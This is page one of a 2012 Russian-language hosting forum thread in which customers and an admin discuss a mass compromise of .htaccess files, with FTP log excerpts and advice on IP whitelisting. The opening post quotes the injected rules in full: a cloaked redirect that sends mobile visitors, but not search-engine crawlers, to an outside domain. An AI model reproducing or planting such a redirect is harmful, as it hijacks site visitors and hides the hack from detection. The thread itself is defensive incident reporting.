FreeHost.com.UA
Сентября 23, 2017, 03:46:25 pm *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Новости: Распродажа серверов http://freehost.com.ua/forum/index.php?topic=2093.0
 
   Начало   Помощь Поиск Войти Регистрация  
Страниц: [1] 2 3 4
  Печать  
Автор Тема: Взломы сайтов  (Прочитано 10511 раз)
rolets
Newbie
*

Karma: 0
Сообщений: 18


Просмотр профиля WWW E-mail
« : Июля 16, 2012, 10:33:08 pm »

Сегодня обнаружил массовые взломы своих сайтов.
Сайты абсолютно разные,  какой самописный, какой на джумле, какой вообще без движка, живут на разных аккаунтах.
Объединяет их только то, что хостятся они здесь, сайты на других хостингах не пострадали.

Пострадали сайты у которых был в корне .htaccess в него был записан кусок кода
Код:
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]

RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]

RewriteRule (.*) http://statiks.ru/?9 [L,R=302] # On

Умудрился пострадать сайт, хостинг для которого я купил два дня назад, его даже поисковые системы не успели узнать о нем.  

Понятно, я удалил вредоносный код, но надо знать как он там появился и что сделать что бы он туда больше не записывался.
Итого пострадало 5 сайтов на разных аккаунтах и 5 на одном.
Что примечательно: загадился один мертво рожденный сайт на который ни один домен не ссылается, так висит когда-то купленный на отдельном аккаунте один хостинг с залитым сайтом так и не включенный в работу. Он то как мог заразится??? 

Что посоветуете?

« Последнее редактирование: Июля 16, 2012, 10:47:00 pm от rolets » Записан
vitos73
Newbie
*

Karma: 0
Сообщений: 3


Просмотр профиля E-mail
« Ответ #1 : Июля 16, 2012, 10:39:40 pm »

Обнаружил тоже самое во всех своих аккаунтах
сервера s13 и s14. Везде дописалась эта дрянь, но:
1. Во все cайты где был .htaccess - вписался. от прав не зависит.
2. где небыло, не вписался.

Администрация, поясните пожалуйста, откуда взялась гадость.
Записан
vitos73
Newbie
*

Karma: 0
Сообщений: 3


Просмотр профиля E-mail
« Ответ #2 : Июля 16, 2012, 10:53:42 pm »

и, да, все файлы .htaccess модифицированы 14.07.2012 в период с 14-00 до 23-00
Записан
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #3 : Июля 17, 2012, 07:15:37 am »

Читаем прикрепленную тему: http://freehost.com.ua/forum/index.php?topic=2124.0
Записан

Lucy in the Sky with Diamonds
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #4 : Июля 17, 2012, 07:22:54 am »

Цитировать
Обнаружил тоже самое во всех своих аккаунтах
сервера s13 и s14

в этом случае с большой вероятностью ломали через FTP -> значит смотрим логи FTP и выставляем вход только с доверенных IP. плюс меняем пароли.
также на этих серверах php работает, используя uid и gid владельца, и есть возможность заблокировать потенциально опасные функции (exec(), eval() и т.д.), посмотрите внимательно раздел "Настройка PHP".

Цитировать
загадился один мертво рожденный сайт на который ни один домен не ссылается, так висит когда-то купленный на отдельном аккаунте один хостинг с залитым сайтом так и не включенный в работу. Он то как мог заразится???

вероятно таки была утечка фтп-паролей. более подробно поможем разобраться после письма на support@freehost.com.ua с указанием логина и списка взломаных сайтов.
скорее всего какой-то из троянов снова активизировался по типу этого:
http://freehost.com.ua/forum/index.php?topic=137.0
« Последнее редактирование: Июля 17, 2012, 07:29:15 am от Komintern » Записан

Lucy in the Sky with Diamonds
rolets
Newbie
*

Karma: 0
Сообщений: 18


Просмотр профиля WWW E-mail
« Ответ #5 : Июля 17, 2012, 08:18:34 am »

Цитировать
вероятно таки была утечка фтп-паролей
Если бы была утечка, вирус или еще какаято хрень с моего компа, были бы заражены мои сайты и на других хостингах, а так только на фрихосте и причем как я понял не только у меня.  

Вот лог одного из сайтов
Код:
Jul 14 10:37:20 s17 pure-ftpd: (popugay@62.113.86.5) [NOTICE] /sata1/home/users/popugay/www//www.popugay.crimea.ua/.htaccess downloaded  (1467 bytes, 26945.43KB/sec)
Jul 14 10:37:20 s17 pure-ftpd: (popugay@62.113.86.5) [NOTICE] /sata1/home/users/popugay/www//www.popugay.crimea.ua/.htaccess uploaded  (3263 bytes, 144.40KB/sec)
Jul 14 10:37:20 s17 pure-ftpd: (popugay@62.113.86.5) [NOTICE] /sata1/home/users/popugay/www//www.popugay.crimea.ua/catalog/.htaccess downloaded  (469 bytes, 43.24KB/sec)
Jul 14 10:37:21 s17 pure-ftpd: (popugay@62.113.86.5) [NOTICE] /sata1/home/users/popugay/www//www.popugay.crimea.ua/catalog/.htaccess uploaded  (1077 bytes, 48.63KB/sec)
Jul 14 10:37:21 s17 pure-ftpd: (popugay@62.113.86.5) [NOTICE] /sata1/home/users/popugay/www//www.popugay.crimea.ua/forum/.htaccess downloaded  (4637 bytes, 90443.58KB/sec)
Jul 14 10:37:21 s17 pure-ftpd: (popugay@62.113.86.5) [NOTICE] /sata1/home/users/popugay/www//www.popugay.crimea.ua/forum/.htaccess uploaded  (6420 bytes, 144.55KB/sec)
Jul 14 10:37:21 s17 pure-ftpd: (popugay@62.113.86.5) [NOTICE] /sata1/home/users/popugay/www//www.popugay.crimea.ua/golos/.htaccess downloaded  (35 bytes, 3.59KB/sec)
Jul 14 10:37:21 s17 pure-ftpd: (popugay@62.113.86.5) [NOTICE] /sata1/home/users/popugay/www//www.popugay.crimea.ua/golos/.htaccess uploaded  (29 bytes, 1.31KB/sec)
Jul 14 10:37:21 s17 pure-ftpd: (popugay@62.113.86.5) [INFO] Logout.
« Последнее редактирование: Июля 17, 2012, 08:21:57 am от rolets » Записан
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #6 : Июля 17, 2012, 09:52:50 am »

> 62.113.86.5

это ваш айпи?
Записан

Lucy in the Sky with Diamonds
rolets
Newbie
*

Karma: 0
Сообщений: 18


Просмотр профиля WWW E-mail
« Ответ #7 : Июля 17, 2012, 09:57:59 am »

 нет
Записан
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #8 : Июля 17, 2012, 10:22:51 am »

Ну вот, значит утечка паролей 100% была. Мы предоставляем возможность установить довереные IP-адреса для соединения по FTP. Это значительно повышает безопасность.
Записан

Lucy in the Sky with Diamonds
rolets
Newbie
*

Karma: 0
Сообщений: 18


Просмотр профиля WWW E-mail
« Ответ #9 : Июля 17, 2012, 03:52:16 pm »

Ха-Ха
сейчас зашел на произвольный сайт который лежит на том же IP  что и мой.
И с первого же раза попал на загаженный сайт!
Беру произвольно второй сайт - все то же.
Похоже весь фрихост теперь такой.
Будете дальше настаивать, что проблема на стороне клиента?

Цитировать
значит утечка паролей 100% была
не отрицаю, только походу пароль это от рута был Веселый
Записан
akok
Newbie
*

Karma: 0
Сообщений: 15


Просмотр профиля WWW
« Ответ #10 : Июля 17, 2012, 08:41:00 pm »

Не сильно ли много сайтов для банальной утечки паролей? S50 тоже был взлом.
Записан
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #11 : Июля 17, 2012, 09:36:48 pm »

Зачастую взломы таки происходят массово в определенные периоды и в определенных диапазонах ip-сетей. Логично, что если бот вносит вредоносные изменения - то он это делает по какому-то упорядоченому списку ip-адресов и акаунтов.
Это не первый подобный случай, и не последний, но повторяю: имеет место быть не взлом _сервера_, а взлом конкретных акаунтов. Вся security-информация на наших серверах мониторится круглосуточно, и никакой утечки root-доступа не было.
В логе каждого взломаного акаунта есть входы по FTP с левых ip-адресов. При наличии у злоумышленника пароля root ему бы не требовалось столь сложной схемы - достаточно запустить на сервере один скрипт.
Записан

Lucy in the Sky with Diamonds
AMBA
Hero Member
*****

Karma: 2
Сообщений: 955



Просмотр профиля E-mail
« Ответ #12 : Июля 17, 2012, 10:27:53 pm »

Таки да, решил проверить, зашёл на s13 где валяется кучка неактивных сайтов, все .htacсess загажены 14.07.12. В соседних аккаунтах где не стояло ограничение по ip, тоже самое. Логов фтп нет, да это и не важно. Такой массовый увод пассов от разных акков у разных клиентов ограниченно на 1-2 серверах считаю маловероятным. Не говоря уже о том что если бы пароли увели лично от меня, то зацепило бы аккаунтов на гораздо большем количестве серверов. Вероятнее всего, нашли щель и увели базы фтп пользователей от нескольких серверов, и по ним уже массово бомбят. Для рута не действовали бы ограничения по ip выставленные для разных пользователей. Кроме того выложенный выше лог показывает что фиксили из под пользователя.

Советую админам серьёзнее присмотреться к этому конкретному взлому, тут очень сильно пахнет дырой. Возможно стоит массово и централизовано сменить все фтп пароли на скомпрометированных серверах и полностью проверить и если получится пофиксить на автомате все .htacсess на этих серверах. Проще наверное достать их из бекапов за 13 число.

Обнаружил вмешательство на s12, s13

Кроме того, обнаружил что в некоторых случаях при добавлении вредоносного кода, скрипт коментил другие строки. В одном файле нашёл вариант, который скрипт обработал видимо дважды, потому что закоментил свой же вредоносный код и добавил новый. Что при этом странно, в один из сайтов аккаунта скрипт умудрился зайти, 2 соседних не тронул, хотя у фтп пользователя был полный доступ на все 3 сайта без ограничений по ip. Кроме того, в 1 случае скрипт воткнул вредоносный код в .htacсess во вложенной директории, в других случаях нет.

Везде ставить ограничения по ip не получается, так как пользователи не всегда понимают почему они не могут попасть на фтп, и не у всех статичные ip и т.п. Да и честно сказать, у меня менялся ip рабочий, это было геморно лазить по 10ку аккаунтов менять их везде поштучно.
Записан
Komintern
FreeHost
*****

Karma: 9
Сообщений: 417


Админ


Просмотр профиля WWW
« Ответ #13 : Июля 17, 2012, 10:46:42 pm »

Цитировать
Логов фтп нет, да это и не важно

Это как раз очень важно. Логины скиньте в личку или тикетом на сапорт.

Цитировать
где не стояло ограничение по ip

опять же, этот лимит работает для пользователя, но не для root. и если он установлен, то бот просто не может залогиниться на фтп.
насчет базы FTP - то она даже не хранится на сервере хостинга. она хранится на центральном сервере, где нет никаких пользовательских акаунтов, скриптов и т.д. там логируется и мониторится абсолютно любая информация, все входы и выходы. с круглосуточным информированием админов по смс Улыбающийся

Цитировать
Что при этом странно, в один из сайтов аккаунта скрипт умудрился зайти, 2 соседних не тронул, хотя у фтп пользователя был полный доступ на все 3 сайта без ограничений по ip

здесь все просто. там, откуда произошла утечка этого пароля, логинились таким образом: ftp login@sitename. данная информация была сохранена и передана в "нужное место", и в базу бота записался именно этот сайт и данные доступа.
« Последнее редактирование: Июля 17, 2012, 10:52:33 pm от Komintern » Записан

Lucy in the Sky with Diamonds
Taurus
Newbie
*

Karma: 0
Сообщений: 23


I f*ck your mind...


Просмотр профиля WWW
« Ответ #14 : Июля 18, 2012, 01:06:37 am »

На sСьoмoмy така ж проблема. Виловив в той же день по даті файлу.
Прописався в кореневий .htaccess і в пару директорій, де були аналогічні файли. Причому прописувався тільки в ті .htaccess, де була вказано RewriteEngine On. Решту файлів .htaccess не зачепило, але дата зміни всіх 14.07.2012 в 01.58 ночі. На всіх сайтах мого акаунту.

Логів доступу по ФТП в панелі управління немає! Ні за той день (кинувся дивитись логи цікаво стало хто накосячив), ні в наступні. В панель управління заходив тільки я (судячи з історії останнього візиту). Комп стерильний. Паролі змінені.
Записан

Страниц: [1] 2 3 4
  Печать  
 
Перейти в:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2006-2011, Simple Machines Valid XHTML 1.0! Valid CSS!